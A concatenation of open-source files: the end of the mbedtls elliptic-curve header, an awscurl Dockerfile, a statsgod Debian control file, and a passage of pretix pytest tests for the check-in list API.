int mbedtls_ecp_point_cmp( const mbedtls_ecp_point *P,
const mbedtls_ecp_point *Q );
/**
* \brief This function imports a non-zero point from two ASCII
* strings.
*
* \param P The destination point.
* \param radix The numeric base of the input.
* \param x The first affine coordinate, as a null-terminated string.
* \param y The second affine coordinate, as a null-terminated string.
*
* \return \c 0 on success.
* \return An \c MBEDTLS_ERR_MPI_XXX error code on failure.
*/
int mbedtls_ecp_point_read_string( mbedtls_ecp_point *P, int radix,
const char *x, const char *y );
/**
* \brief This function exports a point into unsigned binary data.
*
* \param grp The group to which the point should belong.
* \param P The point to export.
* \param format The point format. Should be an \c MBEDTLS_ECP_PF_XXX macro.
* \param olen The length of the output.
* \param buf The output buffer.
* \param buflen The length of the output buffer.
*
* \return \c 0 on success.
* \return #MBEDTLS_ERR_ECP_BAD_INPUT_DATA
* or #MBEDTLS_ERR_ECP_BUFFER_TOO_SMALL on failure.
*/
int mbedtls_ecp_point_write_binary( const mbedtls_ecp_group *grp, const mbedtls_ecp_point *P,
int format, size_t *olen,
unsigned char *buf, size_t buflen );
/**
* \brief This function imports a point from unsigned binary data.
*
* \note This function does not check that the point actually
* belongs to the given group, see mbedtls_ecp_check_pubkey()
* for that.
*
* \param grp The group to which the point should belong.
* \param P The point to import.
* \param buf The input buffer.
* \param ilen The length of the input.
*
* \return \c 0 on success.
* \return #MBEDTLS_ERR_ECP_BAD_INPUT_DATA if input is invalid.
* \return #MBEDTLS_ERR_MPI_ALLOC_FAILED on memory-allocation failure.
* \return #MBEDTLS_ERR_ECP_FEATURE_UNAVAILABLE if the point format
* is not implemented.
*
*/
int mbedtls_ecp_point_read_binary( const mbedtls_ecp_group *grp, mbedtls_ecp_point *P,
const unsigned char *buf, size_t ilen );
/**
* \brief This function imports a point from a TLS ECPoint record.
*
* \note On function return, \p buf is updated to point to immediately
* after the ECPoint record.
*
* \param grp The ECP group used.
* \param pt The destination point.
* \param buf The address of the pointer to the start of the input buffer.
* \param len The length of the buffer.
*
* \return \c 0 on success.
* \return An \c MBEDTLS_ERR_MPI_XXX error code on initialization failure.
* \return #MBEDTLS_ERR_ECP_BAD_INPUT_DATA if input is invalid.
*/
int mbedtls_ecp_tls_read_point( const mbedtls_ecp_group *grp, mbedtls_ecp_point *pt,
const unsigned char **buf, size_t len );
/**
* \brief This function exports a point as a TLS ECPoint record.
*
* \param grp The ECP group used.
* \param pt The point format to export to. The point format is an
* \c MBEDTLS_ECP_PF_XXX constant.
* \param format The export format.
* \param olen The length of the data written.
* \param buf The buffer to write to.
* \param blen The length of the buffer.
*
* \return \c 0 on success.
* \return #MBEDTLS_ERR_ECP_BAD_INPUT_DATA or
* #MBEDTLS_ERR_ECP_BUFFER_TOO_SMALL on failure.
*/
int mbedtls_ecp_tls_write_point( const mbedtls_ecp_group *grp, const mbedtls_ecp_point *pt,
int format, size_t *olen,
unsigned char *buf, size_t blen );
/**
* \brief This function sets a group using standardized domain parameters.
*
* \note The index should be a value of the NamedCurve enum,
* as defined in <em>RFC-4492: Elliptic Curve Cryptography
* (ECC) Cipher Suites for Transport Layer Security (TLS)</em>,
* usually in the form of an \c MBEDTLS_ECP_DP_XXX macro.
*
* \param grp The destination group.
* \param id The identifier of the domain parameter set to load.
*
* \return \c 0 on success,
* \return An \c MBEDTLS_ERR_MPI_XXX error code on initialization failure.
* \return #MBEDTLS_ERR_ECP_FEATURE_UNAVAILABLE for unkownn groups.
*/
int mbedtls_ecp_group_load( mbedtls_ecp_group *grp, mbedtls_ecp_group_id id );
/**
* \brief This function sets a group from a TLS ECParameters record.
*
* \note \p buf is updated to point right after the ECParameters record
* on exit.
*
* \param grp The destination group.
* \param buf The address of the pointer to the start of the input buffer.
* \param len The length of the buffer.
*
* \return \c 0 on success.
* \return An \c MBEDTLS_ERR_MPI_XXX error code on initialization failure.
* \return #MBEDTLS_ERR_ECP_BAD_INPUT_DATA if input is invalid.
*/
int mbedtls_ecp_tls_read_group( mbedtls_ecp_group *grp, const unsigned char **buf, size_t len );
/**
* \brief This function writes the TLS ECParameters record for a group.
*
* \param grp The ECP group used.
* \param olen The number of Bytes written.
* \param buf The buffer to write to.
* \param blen The length of the buffer.
*
* \return \c 0 on success.
* \return #MBEDTLS_ERR_ECP_BUFFER_TOO_SMALL on failure.
*/
int mbedtls_ecp_tls_write_group( const mbedtls_ecp_group *grp, size_t *olen,
unsigned char *buf, size_t blen );
/**
* \brief This function performs multiplication of a point by
* an integer: \p R = \p m * \p P.
*
* It is not thread-safe to use same group in multiple threads.
*
* \note To prevent timing attacks, this function
* executes the exact same sequence of base-field
* operations for any valid \p m. It avoids any if-branch or
* array index depending on the value of \p m.
*
* \note If \p f_rng is not NULL, it is used to randomize
* intermediate results to prevent potential timing attacks
* targeting these results. We recommend always providing
* a non-NULL \p f_rng. The overhead is negligible.
*
* \param grp The ECP group.
* \param R The destination point.
* \param m The integer by which to multiply.
* \param P The point to multiply.
* \param f_rng The RNG function.
* \param p_rng The RNG context.
*
* \return \c 0 on success.
* \return #MBEDTLS_ERR_ECP_INVALID_KEY if \p m is not a valid private
* key, or \p P is not a valid public key.
* \return #MBEDTLS_ERR_MPI_ALLOC_FAILED on memory-allocation failure.
*/
int mbedtls_ecp_mul( mbedtls_ecp_group *grp, mbedtls_ecp_point *R,
const mbedtls_mpi *m, const mbedtls_ecp_point *P,
int (*f_rng)(void *, unsigned char *, size_t), void *p_rng );
/**
* \brief This function performs multiplication and addition of two
* points by integers: \p R = \p m * \p P + \p n * \p Q
*
* It is not thread-safe to use same group in multiple threads.
*
* \note In contrast to mbedtls_ecp_mul(), this function does not
* guarantee a constant execution flow and timing.
*
* \param grp The ECP group.
* \param R The destination point.
* \param m The integer by which to multiply \p P.
* \param P The point to multiply by \p m.
* \param n The integer by which to multiply \p Q.
* \param Q The point to be multiplied by \p n.
*
* \return \c 0 on success.
* \return #MBEDTLS_ERR_ECP_INVALID_KEY if \p m or \p n are not
* valid private keys, or \p P or \p Q are not valid public
* keys.
* \return #MBEDTLS_ERR_MPI_ALLOC_FAILED on memory-allocation failure.
*/
int mbedtls_ecp_muladd( mbedtls_ecp_group *grp, mbedtls_ecp_point *R,
const mbedtls_mpi *m, const mbedtls_ecp_point *P,
const mbedtls_mpi *n, const mbedtls_ecp_point *Q );
/**
* \brief This function checks that a point is a valid public key
* on this curve.
*
* It only checks that the point is non-zero, has
* valid coordinates and lies on the curve. It does not verify
* that it is indeed a multiple of \p G. This additional
* check is computationally more expensive, is not required
* by standards, and should not be necessary if the group
* used has a small cofactor. In particular, it is useless for
* the NIST groups which all have a cofactor of 1.
*
* \note This function uses bare components rather than an
* ::mbedtls_ecp_keypair structure, to ease use with other
* structures, such as ::mbedtls_ecdh_context or
* ::mbedtls_ecdsa_context.
*
* \param grp The curve the point should lie on.
* \param pt The point to check.
*
* \return \c 0 if the point is a valid public key.
* \return #MBEDTLS_ERR_ECP_INVALID_KEY on failure.
*/
int mbedtls_ecp_check_pubkey( const mbedtls_ecp_group *grp, const mbedtls_ecp_point *pt );
/**
* \brief This function checks that an \p mbedtls_mpi is a valid private
* key for this curve.
*
* \note This function uses bare components rather than an
* ::mbedtls_ecp_keypair structure to ease use with other
* structures, such as ::mbedtls_ecdh_context or
* ::mbedtls_ecdsa_context.
*
* \param grp The group used.
* \param d The integer to check.
*
* \return \c 0 if the point is a valid private key.
* \return #MBEDTLS_ERR_ECP_INVALID_KEY on failure.
*/
int mbedtls_ecp_check_privkey( const mbedtls_ecp_group *grp, const mbedtls_mpi *d );
/**
* \brief This function generates a keypair with a configurable base
* point.
*
* \note This function uses bare components rather than an
* ::mbedtls_ecp_keypair structure to ease use with other
* structures, such as ::mbedtls_ecdh_context or
* ::mbedtls_ecdsa_context.
*
* \param grp The ECP group.
* \param G The chosen base point.
* \param d The destination MPI (secret part).
* \param Q The destination point (public part).
* \param f_rng The RNG function.
* \param p_rng The RNG context.
*
* \return \c 0 on success.
* \return An \c MBEDTLS_ERR_ECP_XXX or \c MBEDTLS_MPI_XXX error code
* on failure.
*/
int mbedtls_ecp_gen_keypair_base( mbedtls_ecp_group *grp,
const mbedtls_ecp_point *G,
mbedtls_mpi *d, mbedtls_ecp_point *Q,
int (*f_rng)(void *, unsigned char *, size_t),
void *p_rng );
/**
* \brief This function generates an ECP keypair.
*
* \note This function uses bare components rather than an
* ::mbedtls_ecp_keypair structure to ease use with other
* structures, such as ::mbedtls_ecdh_context or
* ::mbedtls_ecdsa_context.
*
* \param grp The ECP group.
* \param d The destination MPI (secret part).
* \param Q The destination point (public part).
* \param f_rng The RNG function.
* \param p_rng The RNG context.
*
* \return \c 0 on success.
* \return An \c MBEDTLS_ERR_ECP_XXX or \c MBEDTLS_MPI_XXX error code
* on failure.
*/
int mbedtls_ecp_gen_keypair( mbedtls_ecp_group *grp, mbedtls_mpi *d, mbedtls_ecp_point *Q,
int (*f_rng)(void *, unsigned char *, size_t),
void *p_rng );
/**
* \brief This function generates an ECP key.
*
* \param grp_id The ECP group identifier.
* \param key The destination key.
* \param f_rng The RNG function.
* \param p_rng The RNG context.
*
* \return \c 0 on success.
* \return An \c MBEDTLS_ERR_ECP_XXX or \c MBEDTLS_MPI_XXX error code
* on failure.
*/
int mbedtls_ecp_gen_key( mbedtls_ecp_group_id grp_id, mbedtls_ecp_keypair *key,
int (*f_rng)(void *, unsigned char *, size_t), void *p_rng );
/**
* \brief This function checks that the keypair objects
* \p pub and \p prv have the same group and the
* same public point, and that the private key in
* \p prv is consistent with the public key.
*
* \param pub The keypair structure holding the public key.
* If it contains a private key, that part is ignored.
* \param prv The keypair structure holding the full keypair.
*
* \return \c 0 on success, meaning that the keys are valid and match.
* \return #MBEDTLS_ERR_ECP_BAD_INPUT_DATA if the keys are invalid or do not match.
* \return An \c MBEDTLS_ERR_ECP_XXX or an \c MBEDTLS_ERR_MPI_XXX
* error code on calculation failure.
*/
int mbedtls_ecp_check_pub_priv( const mbedtls_ecp_keypair *pub, const mbedtls_ecp_keypair *prv );
#if defined(MBEDTLS_SELF_TEST)
/**
* \brief The ECP checkup routine.
*
* \return \c 0 on success.
* \return \c 1 on failure.
*/
int mbedtls_ecp_self_test( int verbose );
#endif /* MBEDTLS_SELF_TEST */
#ifdef __cplusplus
}
#endif
#endif /* ecp.h */
| {
"pile_set_name": "Github"
} |
FROM python:2.7-alpine
COPY . /
RUN set -ex \
&& apk add --no-cache --virtual .build-deps \
build-base \
libffi-dev \
libxml2-dev \
openssl-dev \
&& apk add --no-cache --virtual .run-deps \
libxslt-dev \
&& pip install -r requirements.txt \
&& apk del .build-deps
ENTRYPOINT ["python", "-m", "awscurl.awscurl"]
| {
"pile_set_name": "Github"
} |
Source: statsgod
Section: web
Priority: optional
Maintainer: Acquia <[email protected]>
Build-Depends: debhelper (>= 9.0.0)
Standards-Version: 3.9.5
Homepage: http://github.com/acquia/statsgod
Package: statsgod
Section: web
Priority: extra
Architecture: amd64
Depends: ${shlibs:Depends}, ${misc:Depends}
Description: Network metric aggregator.
Metrics are sent using TCP, UDP or Unix sockets then aggregated and relayed to
a backend service.
| {
"pile_set_name": "Github"
} |
import datetime
import time
from decimal import Decimal
from unittest import mock
import pytest
from django.utils.timezone import now
from django_countries.fields import Country
from django_scopes import scopes_disabled
from i18nfield.strings import LazyI18nString
from pytz import UTC
from pretix.api.serializers.item import QuestionSerializer
from pretix.base.models import (
Checkin, CheckinList, InvoiceAddress, Order, OrderPosition,
)
@pytest.fixture
def item(event):
return event.items.create(name="Budget Ticket", default_price=23)
@pytest.fixture
def item_on_wrong_event(event2):
return event2.items.create(name="Budget Ticket", default_price=23)
@pytest.fixture
def other_item(event):
return event.items.create(name="Budget Ticket", default_price=23)
@pytest.fixture
def order(event, item, other_item, taxrule):
testtime = datetime.datetime(2017, 12, 1, 10, 0, 0, tzinfo=UTC)
with mock.patch('django.utils.timezone.now') as mock_now:
mock_now.return_value = testtime
o = Order.objects.create(
code='FOO', event=event, email='[email protected]',
status=Order.STATUS_PAID, secret="k24fiuwvu8kxz3y1",
datetime=datetime.datetime(2017, 12, 1, 10, 0, 0, tzinfo=UTC),
expires=datetime.datetime(2017, 12, 10, 10, 0, 0, tzinfo=UTC),
total=46, locale='en'
)
InvoiceAddress.objects.create(order=o, company="Sample company", country=Country('NZ'))
OrderPosition.objects.create(
order=o,
positionid=1,
item=item,
variation=None,
price=Decimal("23"),
attendee_name_parts={'full_name': "Peter"},
secret="z3fsn8jyufm5kpk768q69gkbyr5f4h6w",
pseudonymization_id="ABCDEFGHKL",
)
OrderPosition.objects.create(
order=o,
positionid=2,
item=other_item,
variation=None,
price=Decimal("23"),
attendee_name_parts={'full_name': "Michael"},
secret="sf4HZG73fU6kwddgjg2QOusFbYZwVKpK",
pseudonymization_id="BACDEFGHKL",
)
return o
TEST_ORDERPOSITION1_RES = {
"id": 1,
"require_attention": False,
"order__status": "p",
"order": "FOO",
"positionid": 1,
"item": 1,
"variation": None,
"price": "23.00",
"attendee_name": "Peter",
"attendee_name_parts": {'full_name': "Peter"},
"attendee_email": None,
"voucher": None,
"tax_rate": "0.00",
"tax_value": "0.00",
"tax_rule": None,
"secret": "z3fsn8jyufm5kpk768q69gkbyr5f4h6w",
"addon_to": None,
"checkins": [],
"downloads": [],
"answers": [],
"seat": None,
"company": None,
"street": None,
"zipcode": None,
"city": None,
"country": None,
"state": None,
"subevent": None,
"pseudonymization_id": "ABCDEFGHKL",
}
TEST_ORDERPOSITION2_RES = {
"id": 2,
"require_attention": False,
"order__status": "p",
"order": "FOO",
"positionid": 2,
"item": 1,
"variation": None,
"price": "23.00",
"attendee_name": "Michael",
"attendee_name_parts": {'full_name': "Michael"},
"attendee_email": None,
"voucher": None,
"tax_rate": "0.00",
"tax_value": "0.00",
"tax_rule": None,
"secret": "sf4HZG73fU6kwddgjg2QOusFbYZwVKpK",
"addon_to": None,
"checkins": [],
"downloads": [],
"answers": [],
"seat": None,
"company": None,
"street": None,
"zipcode": None,
"city": None,
"country": None,
"state": None,
"subevent": None,
"pseudonymization_id": "BACDEFGHKL",
}
TEST_LIST_RES = {
"name": "Default",
"all_products": False,
"limit_products": [],
"position_count": 0,
"checkin_count": 0,
"include_pending": False,
"allow_multiple_entries": False,
"allow_entry_after_exit": True,
"subevent": None,
"rules": {}
}
@pytest.fixture
def clist(event, item):
c = event.checkin_lists.create(name="Default", all_products=False)
c.limit_products.add(item)
return c
@pytest.fixture
def clist_all(event, item):
c = event.checkin_lists.create(name="Default", all_products=True)
return c
@pytest.mark.django_db
def test_list_list(token_client, organizer, event, clist, item, subevent):
res = dict(TEST_LIST_RES)
res["id"] = clist.pk
res["limit_products"] = [item.pk]
res["auto_checkin_sales_channels"] = []
resp = token_client.get('/api/v1/organizers/{}/events/{}/checkinlists/'.format(organizer.slug, event.slug))
assert resp.status_code == 200
assert [res] == resp.data['results']
clist.subevent = subevent
clist.save()
res["subevent"] = subevent.pk
resp = token_client.get(
'/api/v1/organizers/{}/events/{}/checkinlists/?subevent={}'.format(organizer.slug, event.slug, subevent.pk))
assert [res] == resp.data['results']
resp = token_client.get(
'/api/v1/organizers/{}/events/{}/checkinlists/?subevent_match={}'.format(organizer.slug, event.slug, subevent.pk))
assert [res] == resp.data['results']
with scopes_disabled():
se2 = event.subevents.create(name="Foobar", date_from=datetime.datetime(2017, 12, 27, 10, 0, 0, tzinfo=UTC))
resp = token_client.get(
'/api/v1/organizers/{}/events/{}/checkinlists/?subevent={}'.format(organizer.slug, event.slug, se2.pk))
assert [] == resp.data['results']
resp = token_client.get(
'/api/v1/organizers/{}/events/{}/checkinlists/?subevent_match={}'.format(organizer.slug, event.slug, se2.pk))
assert [] == resp.data['results']
clist.subevent = None
clist.save()
res["subevent"] = None
resp = token_client.get(
'/api/v1/organizers/{}/events/{}/checkinlists/?subevent_match={}'.format(organizer.slug, event.slug, se2.pk))
assert [res] == resp.data['results']
@pytest.mark.django_db
def test_list_detail(token_client, organizer, event, clist, item):
res = dict(TEST_LIST_RES)
res["id"] = clist.pk
res["limit_products"] = [item.pk]
res["auto_checkin_sales_channels"] = []
resp = token_client.get('/api/v1/organizers/{}/events/{}/checkinlists/{}/'.format(organizer.slug, event.slug,
clist.pk))
assert resp.status_code == 200
assert res == resp.data
@pytest.mark.django_db
def test_list_create(token_client, organizer, event, item, item_on_wrong_event):
resp = token_client.post(
'/api/v1/organizers/{}/events/{}/checkinlists/'.format(organizer.slug, event.slug),
{
"name": "VIP",
"limit_products": [item.pk],
"all_products": False,
"subevent": None,
"rules": {"==": [0, 1]}
},
format='json'
)
assert resp.status_code == 201
with scopes_disabled():
cl = CheckinList.objects.get(pk=resp.data['id'])
assert cl.name == "VIP"
assert cl.limit_products.count() == 1
assert not cl.all_products
assert cl.rules == {"==": [0, 1]}
resp = token_client.post(
'/api/v1/organizers/{}/events/{}/checkinlists/'.format(organizer.slug, event.slug),
{
"name": "VIP",
"limit_products": [item.pk],
"all_products": False,
"subevent": None,
"auto_checkin_sales_channels": [
"web"
]
},
format='json'
)
assert resp.status_code == 201
with scopes_disabled():
cl = CheckinList.objects.get(pk=resp.data['id'])
assert cl.name == "VIP"
assert cl.limit_products.count() == 1
assert not cl.all_products
assert "web" in cl.auto_checkin_sales_channels
resp = token_client.post(
'/api/v1/organizers/{}/events/{}/checkinlists/'.format(organizer.slug, event.slug),
{
"name": "VIP",
"limit_products": [item_on_wrong_event.pk],
"all_products": True,
"subevent": None
},
format='json'
)
assert resp.status_code == 400
assert resp.content.decode() == '{"non_field_errors":["One or more items do not belong to this event."]}'
@pytest.mark.django_db
def test_list_create_with_subevent(token_client, organizer, event, event3, item, subevent, subevent2):
resp = token_client.post(
'/api/v1/organizers/{}/events/{}/checkinlists/'.format(organizer.slug, event.slug),
{
"name": "VIP",
"limit_products": [item.pk],
"all_products": True,
"subevent": subevent.pk
},
format='json'
)
assert resp.status_code == 201
resp = token_client.post(
'/api/v1/organizers/{}/events/{}/checkinlists/'.format(organizer.slug, event.slug),
{
"name": "VIP",
"limit_products": [item.pk],
"all_products": True,
"subevent": subevent.pk,
"auto_checkin_sales_channels": [
"web"
]
},
format='json'
)
assert resp.status_code == 201
with scopes_disabled():
cl = CheckinList.objects.get(pk=resp.data['id'])
assert "web" in cl.auto_checkin_sales_channels
resp = token_client.post(
'/api/v1/organizers/{}/events/{}/checkinlists/'.format(organizer.slug, event.slug),
{
"name": "VIP",
"limit_products": [item.pk],
"all_products": True,
"subevent": None
},
format='json'
)
assert resp.status_code == 201
resp = token_client.post(
'/api/v1/organizers/{}/events/{}/checkinlists/'.format(organizer.slug, event.slug),
{
"name": "VIP",
"limit_products": [],
"all_products": True,
"subevent": subevent2.pk
},
format='json'
)
assert resp.status_code == 400
assert resp.content.decode() == '{"non_field_errors":["The subevent does not belong to this event."]}'
resp = token_client.post(
'/api/v1/organizers/{}/events/{}/checkinlists/'.format(organizer.slug, event3.slug),
{
"name": "VIP",
"limit_products": [],
"all_products": True,
"subevent": subevent2.pk
},
format='json'
)
assert resp.status_code == 400
assert resp.content.decode() == '{"non_field_errors":["The subevent does not belong to this event."]}'
@pytest.mark.django_db
def test_list_update(token_client, organizer, event, clist):
resp = token_client.patch(
'/api/v1/organizers/{}/events/{}/checkinlists/{}/'.format(organizer.slug, event.slug, clist.pk),
{
"name": "VIP",
},
format='json'
)
assert resp.status_code == 200
with scopes_disabled():
cl = CheckinList.objects.get(pk=resp.data['id'])
assert cl.name == "VIP"
resp = token_client.patch(
'/api/v1/organizers/{}/events/{}/checkinlists/{}/'.format(organizer.slug, event.slug, clist.pk),
{
"auto_checkin_sales_channels": [
"web"
],
},
format='json'
)
assert resp.status_code == 200
with scopes_disabled():
cl = CheckinList.objects.get(pk=resp.data['id'])
assert "web" in cl.auto_checkin_sales_channels
@pytest.mark.django_db
def test_list_all_items_positions(token_client, organizer, event, clist, clist_all, item, other_item, order):
with scopes_disabled():
p1 = dict(TEST_ORDERPOSITION1_RES)
p1["id"] = order.positions.first().pk
p1["item"] = item.pk
p2 = dict(TEST_ORDERPOSITION2_RES)
p2["id"] = order.positions.last().pk
p2["item"] = other_item.pk
# All items
resp = token_client.get('/api/v1/organizers/{}/events/{}/checkinlists/{}/positions/?ordering=positionid'.format(
organizer.slug, event.slug, clist_all.pk
))
assert resp.status_code == 200
assert [p1, p2] == resp.data['results']
# Check-ins on other list ignored
with scopes_disabled():
order.positions.first().checkins.create(list=clist)
resp = token_client.get('/api/v1/organizers/{}/events/{}/checkinlists/{}/positions/?ordering=positionid'.format(
organizer.slug, event.slug, clist_all.pk
))
assert resp.status_code == 200
assert [p1, p2] == resp.data['results']
resp = token_client.get('/api/v1/organizers/{}/events/{}/checkinlists/{}/positions/?has_checkin=1'.format(
organizer.slug, event.slug, clist_all.pk
))
assert resp.status_code == 200
assert [] == resp.data['results']
# Only checked in
with scopes_disabled():
c = order.positions.first().checkins.create(list=clist_all)
p1['checkins'] = [
{
'id': c.pk,
'list': clist_all.pk,
'datetime': c.datetime.isoformat().replace('+00:00', 'Z'),
'auto_checked_in': False,
'type': 'entry',
}
]
resp = token_client.get('/api/v1/organizers/{}/events/{}/checkinlists/{}/positions/?has_checkin=1'.format(
organizer.slug, event.slug, clist_all.pk
))
assert resp.status_code == 200
assert [p1] == resp.data['results']
# Only not checked in
resp = token_client.get('/api/v1/organizers/{}/events/{}/checkinlists/{}/positions/?has_checkin=0'.format(
organizer.slug, event.slug, clist_all.pk
))
assert resp.status_code == 200
assert [p2] == resp.data['results']
# Order by checkin
resp = token_client.get(
'/api/v1/organizers/{}/events/{}/checkinlists/{}/positions/?ordering=-last_checked_in'.format(
organizer.slug, event.slug, clist_all.pk
))
assert resp.status_code == 200
assert [p1, p2] == resp.data['results']
resp = token_client.get(
'/api/v1/organizers/{}/events/{}/checkinlists/{}/positions/?ordering=last_checked_in'.format(
organizer.slug, event.slug, clist_all.pk
))
assert resp.status_code == 200
assert [p2, p1] == resp.data['results']
# Order by checkin date
time.sleep(1)
with scopes_disabled():
c = order.positions.last().checkins.create(list=clist_all)
p2['checkins'] = [
{
'id': c.pk,
'list': clist_all.pk,
'datetime': c.datetime.isoformat().replace('+00:00', 'Z'),
'auto_checked_in': False,
'type': 'entry',
}
]
resp = token_client.get(
'/api/v1/organizers/{}/events/{}/checkinlists/{}/positions/?ordering=-last_checked_in'.format(
organizer.slug, event.slug, clist_all.pk
))
assert resp.status_code == 200
assert [p2, p1] == resp.data['results']
# Order by attendee_name
resp = token_client.get('/api/v1/organizers/{}/events/{}/checkinlists/{}/positions/?ordering=-attendee_name'.format(
organizer.slug, event.slug, clist_all.pk
))
assert resp.status_code == 200
assert [p1, p2] == resp.data['results']
resp = token_client.get('/api/v1/organizers/{}/events/{}/checkinlists/{}/positions/?ordering=attendee_name'.format(
organizer.slug, event.slug, clist_all.pk
))
assert resp.status_code == 200
assert [p2, p1] == resp.data['results']
# Paid only
order.status = Order.STATUS_PENDING
order.save()
resp = token_client.get('/api/v1/organizers/{}/events/{}/checkinlists/{}/positions/'.format(
organizer.slug, event.slug, clist_all.pk
))
assert resp.status_code == 200
assert [] == resp.data['results']
resp = token_client.get('/api/v1/organizers/{}/events/{}/checkinlists/{}/positions/?ignore_status=true'.format(
organizer.slug, event.slug, clist_all.pk
))
assert resp.status_code == 200
p1['order__status'] = 'n'
p2['order__status'] = 'n'
assert [p2, p1] == resp.data['results']
@pytest.mark.django_db
def test_list_all_items_positions_by_subevent(token_client, organizer, event, clist, clist_all, item, other_item, order, subevent):
with scopes_disabled():
se2 = event.subevents.create(name="Foobar", date_from=datetime.datetime(2017, 12, 27, 10, 0, 0, tzinfo=UTC))
pfirst = order.positions.first()
pfirst.subevent = se2
pfirst.save()
p1 = dict(TEST_ORDERPOSITION1_RES)
p1["id"] = pfirst.pk
p1["subevent"] = se2.pk
p1["item"] = item.pk
plast = order.positions.last()
plast.subevent = subevent
plast.save()
p2 = dict(TEST_ORDERPOSITION2_RES)
p2["id"] = plast.pk
p2["item"] = other_item.pk
p2["subevent"] = subevent.pk
resp = token_client.get('/api/v1/organizers/{}/events/{}/checkinlists/{}/positions/?ordering=positionid'.format(
organizer.slug, event.slug, clist_all.pk
))
assert resp.status_code == 200
assert [p1, p2] == resp.data['results']
clist_all.subevent = subevent
clist_all.save()
resp = token_client.get('/api/v1/organizers/{}/events/{}/checkinlists/{}/positions/?ordering=positionid'.format(
organizer.slug, event.slug, clist_all.pk
))
assert resp.status_code == 200
assert [p2] == resp.data['results']
@pytest.mark.django_db
def test_list_limited_items_positions(token_client, organizer, event, clist, item, order):
p1 = dict(TEST_ORDERPOSITION1_RES)
with scopes_disabled():
p1["id"] = order.positions.first().pk
p1["item"] = item.pk
# All items
resp = token_client.get('/api/v1/organizers/{}/events/{}/checkinlists/{}/positions/?ordering=positionid'.format(
organizer.slug, event.slug, clist.pk
))
assert resp.status_code == 200
assert [p1] == resp.data['results']
@pytest.mark.django_db
def test_list_limited_items_position_detail(token_client, organizer, event, clist, item, order):
p1 = dict(TEST_ORDERPOSITION1_RES)
with scopes_disabled():
p1["id"] = order.positions.first().pk
p1["item"] = item.pk
# All items
resp = token_client.get('/api/v1/organizers/{}/events/{}/checkinlists/{}/positions/{}/'.format(
organizer.slug, event.slug, clist.pk, p1["id"]
))
assert resp.status_code == 200
assert p1 == resp.data
@pytest.mark.django_db
def test_status(token_client, organizer, event, clist_all, item, other_item, order):
with scopes_disabled():
op = order.positions.first()
var1 = item.variations.create(value="XS")
var2 = item.variations.create(value="S")
op.variation = var1
op.save()
Checkin.objects.create(position=op, list=clist_all)
resp = token_client.get('/api/v1/organizers/{}/events/{}/checkinlists/{}/status/'.format(
organizer.slug, event.slug, clist_all.pk,
))
assert resp.status_code == 200
assert resp.data['checkin_count'] == 1
assert resp.data['position_count'] == 2
assert resp.data['items'] == [
{
'name': str(item.name),
'id': item.pk,
'checkin_count': 1,
'admission': False,
'position_count': 1,
'variations': [
{
'id': var1.pk,
'value': 'XS',
'checkin_count': 1,
'position_count': 1,
},
{
'id': var2.pk,
'value': 'S',
'checkin_count': 0,
'position_count': 0,
},
]
},
{
'name': other_item.name,
'id': other_item.pk,
'checkin_count': 0,
'admission': False,
'position_count': 1,
'variations': []
}
]
@pytest.mark.django_db
def test_custom_datetime(token_client, organizer, clist, event, order):
dt = now() - datetime.timedelta(days=1)
dt = dt.replace(microsecond=0)
with scopes_disabled():
p = order.positions.first().pk
resp = token_client.post('/api/v1/organizers/{}/events/{}/checkinlists/{}/positions/{}/redeem/'.format(
organizer.slug, event.slug, clist.pk, p
), {
'datetime': dt.isoformat()
}, format='json')
assert resp.status_code == 201
assert resp.data['status'] == 'ok'
with scopes_disabled():
assert Checkin.objects.last().datetime == dt
@pytest.mark.django_db
def test_name_fallback(token_client, organizer, clist, event, order):
order.invoice_address.name_parts = {'_legacy': 'Paul'}
order.invoice_address.save()
with scopes_disabled():
op = order.positions.first()
op.attendee_name_cached = None
op.attendee_name_parts = {}
op.save()
resp = token_client.post('/api/v1/organizers/{}/events/{}/checkinlists/{}/positions/{}/redeem/'.format(
organizer.slug, event.slug, clist.pk, op.pk
), {}, format='json')
assert resp.status_code == 201
assert resp.data['status'] == 'ok'
assert resp.data['position']['attendee_name'] == 'Paul'
assert resp.data['position']['attendee_name_parts'] == {'_legacy': 'Paul'}
@pytest.mark.django_db
def test_by_secret(token_client, organizer, clist, event, order):
with scopes_disabled():
p = order.positions.first()
resp = token_client.post('/api/v1/organizers/{}/events/{}/checkinlists/{}/positions/{}/redeem/'.format(
organizer.slug, event.slug, clist.pk, p.secret
), {}, format='json')
assert resp.status_code == 201
assert resp.data['status'] == 'ok'
@pytest.mark.django_db
def test_only_once(token_client, organizer, clist, event, order):
with scopes_disabled():
p = order.positions.first()
resp = token_client.post('/api/v1/organizers/{}/events/{}/checkinlists/{}/positions/{}/redeem/'.format(
organizer.slug, event.slug, clist.pk, p.pk
), {}, format='json')
assert resp.status_code == 201
assert resp.data['status'] == 'ok'
resp = token_client.post('/api/v1/organizers/{}/events/{}/checkinlists/{}/positions/{}/redeem/'.format(
organizer.slug, event.slug, clist.pk, p.pk
), {}, format='json')
assert resp.status_code == 400
assert resp.data['status'] == 'error'
assert resp.data['reason'] == 'already_redeemed'
@pytest.mark.django_db
def test_reupload_same_nonce(token_client, organizer, clist, event, order):
with scopes_disabled():
p = order.positions.first()
resp = token_client.post('/api/v1/organizers/{}/events/{}/checkinlists/{}/positions/{}/redeem/'.format(
organizer.slug, event.slug, clist.pk, p.pk
), {'nonce': 'foobar'}, format='json')
assert resp.status_code == 201
assert resp.data['status'] == 'ok'
resp = token_client.post('/api/v1/organizers/{}/events/{}/checkinlists/{}/positions/{}/redeem/'.format(
organizer.slug, event.slug, clist.pk, p.pk
), {'nonce': 'foobar'}, format='json')
assert resp.status_code == 201
assert resp.data['status'] == 'ok'
@pytest.mark.django_db
def test_allow_multiple(token_client, organizer, clist, event, order):
clist.allow_multiple_entries = True
clist.save()
with scopes_disabled():
p = order.positions.first()
resp = token_client.post('/api/v1/organizers/{}/events/{}/checkinlists/{}/positions/{}/redeem/'.format(
organizer.slug, event.slug, clist.pk, p.pk
), {}, format='json')
assert resp.status_code == 201
assert resp.data['status'] == 'ok'
resp = token_client.post('/api/v1/organizers/{}/events/{}/checkinlists/{}/positions/{}/redeem/'.format(
organizer.slug, event.slug, clist.pk, p.pk
), {}, format='json')
assert resp.status_code == 201
assert resp.data['status'] == 'ok'
with scopes_disabled():
assert p.checkins.count() == 2
@pytest.mark.django_db
def test_allow_multiple_reupload_same_nonce(token_client, organizer, clist, event, order):
clist.allow_multiple_entries = True
clist.save()
with scopes_disabled():
p = order.positions.first()
